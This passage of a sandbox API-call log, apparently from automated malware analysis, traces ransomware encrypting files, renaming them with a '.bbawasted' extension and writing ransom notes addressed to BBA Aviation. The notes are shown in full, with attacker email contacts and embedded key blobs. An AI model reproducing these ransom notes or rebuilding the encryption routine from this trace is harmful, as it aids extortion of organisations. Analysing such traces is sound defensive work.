3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NBPVIu2Y1sqlHiPXav3KVGbv2UZANKEeoZSsLcZsIT/rcHQa0fTnh7qs2UuselhT\r\n0etM9xQnUOnz5qHwWuAy6U8KtKmMFhFo1LPkMEiLhL44IAJ3cHg0rCjNkJ98MDxR\r\nFRy1AZgCSCGrwycnftFwyItxTyBIjMIWeNWRmccKc5Y1zBWz7Hc+lEFodTo6PlHq\r\nHPMCFITBuFSmFpM6ti9rb6qUk+v3EEzmmEmLl3NzYrMnMu9NucOb/HEbmP/UDbT7\r\n59/nSmcC6VH66cmYumjBw/XG0BOTlcXc3wcsRausBvkyRW2n8ZbIa53u986NEbe9\r\nEnfV05RVTdmUbwUo7blQ7U8E2Fs3UjbvKBTdYB7O5NwpOLGz5kcUc0xZ4AB3TTk9\r\nMZD9xxi4a5c42zOnhiuzDwtW1JRNIu/xi/PSkTmZRyqSPB/+X+jrusWSr1Nb1MKx\r\nNKTIRCy0VWzcLh3RUKfPnSyksp97x1EHAdrz67n3nwtJjb0zVhSv+K6h5ma2unle\r\n/LzhSsIN0aFxLeX3DTqjVGyM07fbI7IO/iOF2JhtXjWcLTRj4g3VZAGX647S65aI\r\nwE4B3qjgpP0kAJw/7yNvIIYtR2+ltlBP3AZPUOeSBBNDSoW/eA8b3IQU9njfnxfE\r\nIeoeX6ygAeqGRWtOc0cggUczOivO1Yv8IVbN9NZct5t=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.034] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.034] WriteFile (in: hFile=0x28c, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0160.035] SetEndOfFile (hFile=0x28c) returned 1 [0160.038] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.038] CloseHandle (hObject=0x28c) returned 1 [0160.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0160.040] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0b38 | out: hHeap=0x660000) returned 1 [0160.040] _aulldvrm () returned 0x0 [0160.040] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0160.041] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0160.041] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.041] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned 39 [0160.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0160.041] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.041] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.041] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0160.042] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6a5e60 | out: pbBuffer=0x6a5e60) returned 1 [0160.042] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.042] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0160.076] WriteFile (in: hFile=0x290, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.077] SetEndOfFile (hFile=0x290) returned 1 [0160.077] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.077] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.077] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted")) returned 1 [0160.088] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0160.088] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0160.089] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe76 [0160.089] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe76) returned 0x630000 [0160.089] CloseHandle (hObject=0x280) returned 1 [0160.187] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.187] CloseHandle (hObject=0x28c) returned 1 [0160.187] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.187] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x66d1d0) returned 1 [0160.188] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.188] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0160.188] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x66d1d0) returned 1 [0160.188] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0160.188] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0160.199] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.199] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.200] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0160.200] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YWIZXL9IVXjF2etbLs9cs84jBvx2tXNtmsv6d8lhDf8E3kGUbDWp+g5ZMznzOfi6\r\nYEuuKBto8sB2wjKQI2mnSoSHwNR9wXMOZCRzdZyDmvD2Bz61JvruVL70qwUHUpSc\r\nifC9q6H9cP96WKit5ezTsm38NmfGjRbMWhm+Anqu0fC2gKvyK+f5mK6EKlB0TMVK\r\nJ/nqr50oaEb9QvPcFGHkfNTG7JuLglexWRZWJkDHK/Kzh1pndtxygiwQoh0wjoxK\r\nqMAelYyA5I8pt9KxPuTwP3v4Krs1xof6qwJ89JnI06m0vQO9aH4V6+f9clmjOr6Q\r\neQ6j46X3dFfNpI5U41xkgUd4SfCoPvgB6H2bX+FwghQ4feG0R4TSgCEargPqZDvS\r\nqGMF0p3OBtRaa1daVHP0Kl1OVsQBA4P8+v8QV/NuwKhRUfAFDbWBD8UUC9NcWSha\r\nGeb5LJYNsat6ATL7nAFkminLEb2vP3gyD/ORk5QSd4+tHVHvT7rOEZVN0t2h76et\r\n6fqPQWZA801tDemekoEZTsZIo4cV30zjyWNRgH1M7k9l1tGH7rui85HdHV95gXmt\r\nwPvC3PgInZWB+/LQlvc2RBdJa+t9/o20buq5gQ0RGAgueqdJ/ZXbNLWk0F79efVm\r\nMffFi4Ck2oZ3tRDZFvKqW2QQaUBRYIoZp7rutube6Tr=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.200] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.200] WriteFile (in: hFile=0x290, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0160.200] SetEndOfFile (hFile=0x290) returned 1 [0160.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0160.206] CloseHandle (hObject=0x290) returned 1 [0160.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0160.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0bf8 | out: hHeap=0x660000) returned 1 [0160.215] _aulldvrm () returned 0x0 [0160.215] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x66d1d0) returned 1 [0160.216] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0160.216] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0160.216] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 39 [0160.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x258) returned 0x69e318 [0160.216] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0160.216] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x66d1d0) returned 1 [0160.217] CryptGenRandom (in: hProv=0x66d1d0, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0160.217] CryptReleaseContext (hProv=0x66d1d0, dwFlags=0x0) returned 1 [0160.217] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0160.275] WriteFile (in: hFile=0x28c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.276] SetEndOfFile (hFile=0x28c) returned 1 [0160.277] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.277] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0160.277] lstrcpyW (in: lpString1=0x69e366, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted")) returned 1 [0160.277] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0160.277] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0160.278] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xdc6 [0160.278] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdc6) returned 0x630000 [0160.278] CloseHandle (hObject=0x280) returned 1 [0160.460] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.461] CloseHandle (hObject=0x290) returned 1 [0160.461] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.461] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0160.461] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.461] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.461] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0160.462] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0160.462] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a0928 [0160.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0160.473] _snwprintf (in: _Dest=0x6ac8f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iVciymrrDqx+GV60jkSjXb8lNPeqXjq4CKm+FnyBiBJPOEG5AfMBn5nnaSwOnx9y\r\nYjAttnUaQAvN4Ns7SNCfDOB/VJbIdpfS+AFhw4e8IVAd4FW3ofVNu5RcIvjlLTiZ\r\nLna2zhcFyrbuL8bHXSbCvKYn5VfG+OIREgCSs2e0phwSjpaeqhHMl4QX3CKTO2Y1\r\nD74LQSRvGh8SNyhIv8p1XQ01JVTri4wxNShbwMQaCmLxqFe/MkOUQutlqouTNaNg\r\nKa7jNGB+3juDIHTSPQi4OkF8Fg4liRlUbfSezJAB74ej57LXhfx2kcYDf+C8Fjfa\r\naoCh6Bjng/MVRm8lUpS+g2S4RhN4da/NeeQS3k1KLZpNPRXmE5oLqaNurO8+GsGY\r\nSRezDLYwR9Wu82IHFrvvOFgvEj34qC2klOwenBpmU1CVMtPyutncbbzbeGKVGB/Q\r\ncl9TKdSSyrQ4L3bOmdSPL56zB0kRgKdBb4+B74kJ33teM6USfej6fu/FsGWaSKD8\r\nk4oktNnunsescjhb7re4CdcZGZmI93rIaP96ftodiDqwdq2kC5EAFFvpYm3tHB2Q\r\nK3Ss1uCmBk0z901u7kfph2x5kmuzdjysxuaVdfK+Is4frAQWvyLPFbrIqk2nsdJt\r\n0RzoBgJjzvgyCU9lF5xzEvgXaPfJGjpe9E0abGDEJfr=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0160.473] WriteFile (in: hFile=0x28c, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0160.473] SetEndOfFile (hFile=0x28c) returned 1 [0160.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0160.476] CloseHandle (hObject=0x28c) returned 1 [0160.480] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0160.481] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0d60 | out: hHeap=0x660000) returned 1 [0160.481] _aulldvrm () returned 0x0 [0160.481] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0160.481] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0160.482] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.482] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 48 [0160.482] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0160.482] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0160.482] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ac8f8 [0160.482] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6aef50) returned 1 [0160.482] CryptGenRandom (in: hProv=0x6aef50, dwLen=0xa3a, pbBuffer=0x6ac8f8 | out: pbBuffer=0x6ac8f8) returned 1 [0160.482] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.482] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0160.511] WriteFile (in: hFile=0x290, lpBuffer=0x6ac8f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ac8f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0160.512] SetEndOfFile (hFile=0x290) returned 1 [0160.512] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.512] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ac8f8 | out: hHeap=0x660000) returned 1 [0160.512] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0160.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.bbawasted")) returned 1 [0160.549] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0160.549] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0160.549] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1198c [0160.550] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1198c) returned 0x630000 [0160.550] CloseHandle (hObject=0x288) returned 1 [0160.815] UnmapViewOfFile (lpBaseAddress=0x630000) returned 1 [0160.816] CloseHandle (hObject=0x28c) returned 1 [0160.817] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0160.820] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6aef50) returned 1 [0160.821] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0160.821] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.821] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6aef50) returned 1 [0160.822] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0160.822] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0160.833] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0160.833] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a5e60 [0160.833] _snwprintf (in: _Dest=0x6a5e60, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]X54mSQT0wRd1yJEIWhWB2j3aMQSzvqKk3WG/WOd7218FQENuvkkPx0QlDSh+ikq0\r\nfvVzjwhf+XccrlmiFpSW6+9Wibc5YZIV5ZGGN+ZAnrApztndbmlh3IFHfJhWHn4r\r\n5/fpa8106ayXY7OIX/DqBUk5gb+PnGL31QucD7/+3ZVSN4/I4PnPi3EnoV0EWoWk\r\nLdW2ZCsGy4wQu4OiV6/KI0V/iPUIUrdxHmXk8+p3C7DgslobXiVsEQySHqTB+t6O\r\na6/frGXTm45dn2yGZo1Tze7+5AJH1lYs9vlSFL3iGszg5T5ceG3/6m0A8q9TnKoc\r\nd6PmBBc9+3LLsfLAnCaQWZCqzj3ywQeOkAY8tuXXRuAxPm14x3A/gxBiQbj0Q6qA\r\nnbYSm28hnenuc3bdTO7P9Q2sUzk462BLLVUlksupiaThiqwYM0ZaBltkbNrtKkYf\r\noAu5aie4dFiC7RpjEIPPloVhJuYSw3cBS/rupfO9XGG/WqeuJBlbHdJ9p4g104o5\r\nQxckeZhAc53PxcTEF5rI/i600E4leygD0UZrWJP0gOl37Ha4b2IMmDhI2PrdgNMc\r\n5W4tPIyr3/BNp26gxwp2YQ9J8d0BFeOGK56x2xq/G6+CBcOCDO4POLiO+APpnxK0\r\nO6Xzs8E7+nL2cHN+xXd4eOT49OJktqoIWWfspGFCvkB=[end_key]\r\nKEEP IT\r\n") returned 984 [0160.833] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0160.833] WriteFile (in: hFile=0x290, lpBuffer=0x6a5e60*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a5e60*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0160.834] SetEndOfFile (hFile=0x290) returned 1 [0160.836] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a5e60 | out: hHeap=0x660000) returned 1 [0160.836] CloseHandle (hObject=0x290) returned 1 [0160.838] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0160.839] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0f70 | out: hHeap=0x660000) returned 1 [0160.839] _aulldvrm () returned 0x0 [0160.839] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6aef50) returned 1 [0160.839] CryptGenRandom (in: hProv=0x6aef50, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0160.840] CryptReleaseContext (hProv=0x6aef50, dwFlags=0x0) returned 1 [0160.840] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 48 [0160.840] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0160.840] 